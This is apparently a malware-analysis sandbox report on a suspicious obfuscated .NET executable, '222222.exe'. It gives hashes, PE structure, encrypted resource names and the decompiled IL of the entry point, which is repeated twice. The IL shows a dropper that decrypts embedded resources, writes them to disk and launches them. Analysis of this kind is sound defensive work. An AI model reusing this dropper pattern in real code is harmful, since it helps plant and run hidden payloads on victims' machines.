Suspicious
Suspect

4677e7b998901e572f93e8b1ba65a90d

PE Executable
|
MD5: 4677e7b998901e572f93e8b1ba65a90d
|
Size: 16.88 MB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

High

Hash
 Hash Value
MD5
4677e7b998901e572f93e8b1ba65a90d
Sha1
aaae7fbf53743b155caa505326ddb4a23a807adb
Sha256
86d42bfe401a938d6c4310d5750d4f45bdaa778159b0fa318dc70b855056389c
Sha384
706e605a5c520f4c786be59aec43b9aad323b30c55f7975482ad466c47b0596b1701ae9aac14a58fd65a54571d519e82
Sha512
19c33eb7177eab148481aa04df0f554650c07283c37bb72ba5ba6904c1fc81f7256805dd11017af52d657bb56d86d54fb63c0a107247da3d1647a8d9d986ed95
SSDeep
393216:fzkHWHy9m4LnZjHG4Za7RG/iIk7mLP99jRbrzPBnvkj4j:fIHWHyXLnZj1a7MSkpRbrThvkS
TLSH
3E07333AE1802F47FCA9997DD9FFE64367A7F2F02C7D916584828EF1588495D0A36203

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual C++ v6.0 DLL
Microsoft Visual Studio .NET
File Structure
4677e7b998901e572f93e8b1ba65a90d
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
zjkzvjriirverefm.Resources
frblqqkgwdzdgspp
hhgzdfssurwsgkmv
jbuwutmgzrczutxs
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

222222.exe
Full Name

222222.exe
EntryPoint

System.Void yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::Main()
Scope Name

222222.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

222222
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

19
Main Method

System.Void yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::Main()
Main IL Instruction Count

138
Main IL

ldc.i4.3 <null> newarr System.String[] stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> ldc.i4.4 <null> newarr System.String stloc.s V_5 ldloc.s V_5 ldc.i4.0 <null> ldstr U0udGU8uKUUajNx8IhSEiQ== stelem.ref <null> ldloc.s V_5 ldc.i4.1 <null> ldstr 4X60Xay4mcinInKuVf30Lw== stelem.ref <null> ldloc.s V_5 ldc.i4.2 <null> ldstr jbuwutmgzrczutxs stelem.ref <null> ldloc.s V_5 ldc.i4.3 <null> ldstr cCNKEWnoSz7jlRwYEVWKkw== stelem.ref <null> ldloc.s V_5 stelem.ref <null> ldloc.s V_4 ldc.i4.1 <null> ldc.i4.4 <null> newarr System.String stloc.s V_6 ldloc.s V_6 ldc.i4.0 <null> ldstr U0udGU8uKUUajNx8IhSEiQ== stelem.ref <null> ldloc.s V_6 ldc.i4.1 <null> ldstr iXDv2l141jXzUyKHUpSrpg== stelem.ref <null> ldloc.s V_6 ldc.i4.2 <null> ldstr hhgzdfssurwsgkmv stelem.ref <null> ldloc.s V_6 ldc.i4.3 <null> ldstr cCNKEWnoSz7jlRwYEVWKkw== stelem.ref <null> ldloc.s V_6 stelem.ref <null> ldloc.s V_4 ldc.i4.2 <null> ldc.i4.4 <null> newarr System.String stloc.s V_7 ldloc.s V_7 ldc.i4.0 <null> ldstr m8NEAnShlF10q8AnjMm+Og== stelem.ref <null> ldloc.s V_7 ldc.i4.1 <null> ldstr UTDukSUK7c49y3qsoo3fGYaXDPfO01k2Pcp44BKp0Mg= stelem.ref <null> ldloc.s V_7 ldc.i4.2 <null> ldstr frblqqkgwdzdgspp stelem.ref <null> ldloc.s V_7 ldc.i4.3 <null> ldstr cCNKEWnoSz7jlRwYEVWKkw== stelem.ref <null> ldloc.s V_7 stelem.ref <null> ldloc.s V_4 stloc.0 <null> ldstr zjkzvjriirverefm call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly) stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> br.s IL_012D: ldloc.2 ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> ldstr jxHlyaBjp+2NQa+xCz2kDsR59eD1bH9Ud2ev+LtRoxA= call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_00D7: call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> call System.String yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::ahasbfpzscvvznklcdagbbalpc(System.String) call System.String System.Environment::GetEnvironmentVariable(System.String) br.s IL_00DC: ldloc.0 call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.1 <null> ldelem.ref <null> call System.String yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::ahasbfpzscvvznklcdagbbalpc(System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.3 <null> ldloc.1 <null> ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.2 <null> ldelem.ref <null> callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Byte[] yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::cdeaqnuqstsmrgvuauucpytchtlpqh(System.Byte[]) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.3 <null> ldelem.ref <null> call System.String yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::ahasbfpzscvvznklcdagbbalpc(System.String) ldstr cCNKEWnoSz7jlRwYEVWKkw== call System.String yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::ahasbfpzscvvznklcdagbbalpc(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0129: ldloc.2 ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldc.i4.3 <null> blt.s IL_00B5: ldloc.0 ret <null>
Module Name

222222.exe
Full Name

222222.exe
EntryPoint

System.Void yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::Main()
Scope Name

222222.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

222222
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

19
Main Method

System.Void yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::Main()
Main IL Instruction Count

138
Main IL

ldc.i4.3 <null> newarr System.String[] stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> ldc.i4.4 <null> newarr System.String stloc.s V_5 ldloc.s V_5 ldc.i4.0 <null> ldstr U0udGU8uKUUajNx8IhSEiQ== stelem.ref <null> ldloc.s V_5 ldc.i4.1 <null> ldstr 4X60Xay4mcinInKuVf30Lw== stelem.ref <null> ldloc.s V_5 ldc.i4.2 <null> ldstr jbuwutmgzrczutxs stelem.ref <null> ldloc.s V_5 ldc.i4.3 <null> ldstr cCNKEWnoSz7jlRwYEVWKkw== stelem.ref <null> ldloc.s V_5 stelem.ref <null> ldloc.s V_4 ldc.i4.1 <null> ldc.i4.4 <null> newarr System.String stloc.s V_6 ldloc.s V_6 ldc.i4.0 <null> ldstr U0udGU8uKUUajNx8IhSEiQ== stelem.ref <null> ldloc.s V_6 ldc.i4.1 <null> ldstr iXDv2l141jXzUyKHUpSrpg== stelem.ref <null> ldloc.s V_6 ldc.i4.2 <null> ldstr hhgzdfssurwsgkmv stelem.ref <null> ldloc.s V_6 ldc.i4.3 <null> ldstr cCNKEWnoSz7jlRwYEVWKkw== stelem.ref <null> ldloc.s V_6 stelem.ref <null> ldloc.s V_4 ldc.i4.2 <null> ldc.i4.4 <null> newarr System.String stloc.s V_7 ldloc.s V_7 ldc.i4.0 <null> ldstr m8NEAnShlF10q8AnjMm+Og== stelem.ref <null> ldloc.s V_7 ldc.i4.1 <null> ldstr UTDukSUK7c49y3qsoo3fGYaXDPfO01k2Pcp44BKp0Mg= stelem.ref <null> ldloc.s V_7 ldc.i4.2 <null> ldstr frblqqkgwdzdgspp stelem.ref <null> ldloc.s V_7 ldc.i4.3 <null> ldstr cCNKEWnoSz7jlRwYEVWKkw== stelem.ref <null> ldloc.s V_7 stelem.ref <null> ldloc.s V_4 stloc.0 <null> ldstr zjkzvjriirverefm call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly) stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> br.s IL_012D: ldloc.2 ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> ldstr jxHlyaBjp+2NQa+xCz2kDsR59eD1bH9Ud2ev+LtRoxA= call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_00D7: call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> call System.String yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::ahasbfpzscvvznklcdagbbalpc(System.String) call System.String System.Environment::GetEnvironmentVariable(System.String) br.s IL_00DC: ldloc.0 call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.1 <null> ldelem.ref <null> call System.String yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::ahasbfpzscvvznklcdagbbalpc(System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.3 <null> ldloc.1 <null> ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.2 <null> ldelem.ref <null> callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Byte[] yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::cdeaqnuqstsmrgvuauucpytchtlpqh(System.Byte[]) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.3 <null> ldelem.ref <null> call System.String yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::ahasbfpzscvvznklcdagbbalpc(System.String) ldstr cCNKEWnoSz7jlRwYEVWKkw== call System.String yakcutfdvpfsabtnsnu.yakcutfdvpfsabtnsnu::ahasbfpzscvvznklcdagbbalpc(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0129: ldloc.2 ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldc.i4.3 <null> blt.s IL_00B5: ldloc.0 ret <null>
4677e7b998901e572f93e8b1ba65a90d (16.88 MB)
File Structure
4677e7b998901e572f93e8b1ba65a90d
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
zjkzvjriirverefm.Resources
frblqqkgwdzdgspp
hhgzdfssurwsgkmv
jbuwutmgzrczutxs
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙